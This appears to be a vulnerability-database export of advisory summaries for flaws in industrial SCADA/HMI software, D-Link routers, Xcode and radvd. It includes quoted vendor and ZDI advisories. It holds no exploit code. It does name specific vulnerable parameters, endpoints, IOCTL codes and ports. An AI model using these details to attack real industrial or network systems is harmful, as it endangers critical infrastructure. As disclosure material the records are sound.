| var-201805-1147 | WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability 3. Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable |
| var-201902-0647 | LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteString method. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the Memory.Integer method. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition |
| var-201908-0863 | Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of project files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities. 9502-Ax) version 16.00.00 and earlier |
| var-201912-0120 | A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. LLVM (Low Level Virtual Machine) is a framework system of a framework compiler (compiler) developed by the LLVM team. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE----- |
| var-201912-0114 | A memory corruption issue was addressed with improved validation. This issue is fixed in Xcode 11.2. Processing a maliciously crafted file may lead to arbitrary code execution. apple's Xcode Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. A security vulnerability exists in LLVM components in versions of Apple Xcode prior to 11.2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-11-01-1 Xcode 11.2 Xcode 11.2 addresses the following: llvm Available for: macOS Mojave 10.14.4 and later Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8800: Pan ZhenPeng of Qihoo 360 Nirvan Team CVE-2019-8806: Pan ZhenPeng of Qihoo 360 Nirvan Team Installation note: Xcode 11.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "11.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl27tlwACgkQBz4uGe3y 0M3xfA/6Ar1hsMVC9/i7vbHnKFv1nSo5k3dgl3t6UepPM2HW7YR9ngxKXW6r95DB hH9TELVnvluC15EfXbsB+OhcgIxCc8EJYvAs4Y+n34VL/A03WyIDaYB7/TO8NLaL Wh5O7/unhEijj+HhTiveS6x7Fimyw7WzVmLJvIoAN8EBXtvfWTA/VywAgHuX/aVB 2fdMOHDsVUI3a8SBzTSiHs6BM27TCoKx+FI3Ad+yABmxj+SykCfDcFOtxsyFhiBh m6fIPweMxXtKc3tZPQYLtu05UPoBlOclNiAbBt5I7jdd9uNekjLQFaMf+D+gGGZI BIILI1dCg+dQeDKPeMJsdSpcMqqyUvGfTzYW7JNQsGM1LFvS+8e7SLoCKJuIgosK dMkuK/kg05vOGgq6qFyGn/vDDXqoVpbFq+HN6tNU5i0ni8Y5vuE8ecttUJA6XTiA fF7U6AeSxQov5HS9RW8UzyCUktpPtiRuUYr3QWRpEoPsuWiPqvEprHe0FS+tJh3h Zkz42DV8gD5gogakX1oJpX+CTZa725WusiuFs0bdCkougssrGYaRnMe+YL7/Z6ej pAvNOGe4GesS0COGxkXgFK0w6VIC+SGVNdXkCudaYS+C4rklclVmXulKTavldUos D7ebNEuHgE2/H66H0A1zZf4YDP4KqVb/j2T15wiA4uYiU67jN94= =KAxM -----END PGP SIGNATURE----- |
| var-202305-1589 | D-Link DIR-2150 SetSysEmailSettings EmailTo Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20559. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company |
| var-202407-0235 | Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company |
| var-202407-0234 | Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company |
| var-202407-0233 | Delta Electronics CNCSoft-G2 lacks proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company |
| var-202407-0232 | Delta Electronics CNCSoft-G2 lacks proper validation of user-supplied data, which can result in a memory corruption condition. If a target visits a malicious page or opens a malicious file an attacker can leverage this vulnerability to execute code in the context of the current process. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics CNCSoft-G2. Delta Electronics CNCSoft-G2 is a human-machine interface (HMI) software from Delta Electronics, a Chinese company |
| var-201112-0097 | Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080. CoDeSys is a powerful PLC software programming tool that supports IEC61131-3 standard IL, ST, FBD, LD, CFC, SFC six PLC programming languages. The GatewayService has an integer overflow. The GatewayService uses the 32-bit value offset at the header 0x0c to specify the size of the received data. The program receives this value, increasing the number of 0x34 and allocating the amount of memory can cause an integer overflow. CmpWebServer is a component of the 3SRTESrv3 and CoDeSysControlService services for handling 8080 port connections. The function 0040f480 copies the input URI to a limited stack buffer, which can trigger a buffer overflow. 3S CoDeSys handles the Content-Length value in an HTTP POST request to trigger a null pointer reference. CoDeSys is prone to a stack-based buffer-overflow and an integer-overflow vulnerability. Failed attacks may cause a denial-of-service condition |
| var-201801-0152 | An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3 |
| var-201801-0151 | A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwprtscr utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment |
| var-201807-0341 | ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IPAddress parameters of the ABB BEControlLogix OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland |
| var-201806-1058 | Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is required to exploit this vulnerability.The specific flaw exists within the ADDUSER command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products |
| var-201906-1029 | In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. WebAccess/SCADA Is NULL A vulnerability related to pointer dereference exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess/SCADA is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple stack-based buffer-overflow vulnerabilities 3. Multiple heap-based buffer-overflow vulnerabilities 4. An information disclosure vulnerability 5. Multiple remote-code execution vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, modify and delete files, use directory-traversal sequences (â??../â??) to retrieve arbitrary files, escalate privileges and perform certain unauthorized actions or obtain sensitive information. This may aid in further attacks. Advantech WebAccess/SCADA Versions 8.3.5 and prior versions are vulnerable. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products |
| var-202004-0077 | There are multiple ways an unauthenticated attacker could perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to the handleTargetsByDeviceName method of the MibBrowser class. When parsing the deviceName parameter of the targets endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose file contents in the context of SYSTEM. Advantech WebAccess/NMS is a set of Web browser-based Network Management System (NMS) software package developed by China Taiwan Advantech Corporation. There is a SQL injection vulnerability in Advantech WebAccess/NMS versions earlier than 3.0.2 |
| var-202206-2050 | The affected product is vulnerable to multiple SQL injections, which may allow an unauthorized attacker to disclose information. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet endpoint, which listens on TCP port 8080 by default. When parsing the PROP_GetCommunity and PROP_SetCommunity elements of the performSearchDevice action, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise |
| var-202305-1981 | D-Link DIR-2150 SetSysEmailSettings AccountName Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20555. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company |
| var-202305-0214 | D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link |
| var-202305-0130 | D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link |
| var-202407-0441 | A vulnerability has been identified in SIMATIC PCS 7 V9.1 (All versions), SIMATIC WinCC Runtime Professional V18 (All versions), SIMATIC WinCC Runtime Professional V19 (All versions < V19 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 23), SIMATIC WinCC V7.5 (All versions < V7.5 SP2 Update 17), SIMATIC WinCC V8.0 (All versions < V8.0 Update 5). The affected products do not properly handle certain requests to their web application, which may lead to the leak of privileged information. This could allow an unauthenticated remote attacker to retrieve information such as users and passwords. Siemens SIMATIC PCS 7 is a process control system from Siemens, Germany. SIMATIC WinCC is an automated supervisory control and data acquisition (SCADA) system. SIMATIC WinCC Runtime Professional is a visual runtime platform for operators to control and monitor machines and equipment |
| var-201105-0156 | Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method. Overly long to method bstrFileName argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Indusoft Thin Client. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ISSymbol.ocx ActiveX component. When an overly large string is passed as the 'InternationalOrder' parameter, a heap overflow occurs. This vulnerability can be leveraged to execute code under the context of the user running the browser. InduSoft Web Studio is a powerful and complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. The Advantech Studio ISSymbol ActiveX control handles boundary errors in the \"InternationalSeparator\" property. The Advantech Studio ISSymbol ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Failed exploit attempts will likely result in denial-of-service conditions. Advantech Studio 6.1 SP6 Build 61.6.01.05 is vulnerable; other versions may also be affected. There are multiple buffer overflow vulnerabilities in InduSoft ISSymbol ActiveX control 6.1 SP6 Build 61.6.01.05 (ISSymbol.ocx 61.6.0.0) and other versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-168 : InduSoft Thin Client ISSymbol InternationalSeparator Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-168 August 29, 2012 - -- CVE ID: CVE-2011-0340 - -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P - -- Affected Vendors: Indusoft - -- Affected Products: Indusoft WebStudio - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12446. - -- Vendor Response: Indusoft has issued an update to correct this vulnerability. More details can be found at: http://www.indusoft.com/hotfixes/hotfixes.php - -- Disclosure Timeline: 2011-12-19 - Vulnerability reported to vendor 2012-08-29 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Alexander Gavrun - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBUD4cZ1VtgMGTo1scAQJoagf/ZpDTiahOQlERNABRglBe8krgQHhSHddX qVTQjFEyoOL8df5cA/I3JLJxEYRzcT0k8FSdoHUAMDWA8Oxv1BB62r7fgHC1BFjp jbH6u0mL+eYd95jqwfYaruakhABiCRR73nCxYvYGb1Bvx6piBDneD9E+Nx+qycF5 HKb5Fr0wwT+sWssIsnAHx5jDUamdRyQfOR1MAzb6GfKWDsRqwr/T5hWvRLqbZ3Cj VXwmd+MIIAQZIMJ8swKgBvbSeV4tcePun1NhqJYAJtySYR6a6oF112Gk+kXlNXDi EvynyGSXvzLMKEd+vmzSBbVeftCxNQJ8Ce4Vg+LYMGk0YHfoupt3gQ== =Fw26 -----END PGP SIGNATURE----- |
| var-201402-0028 | The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG 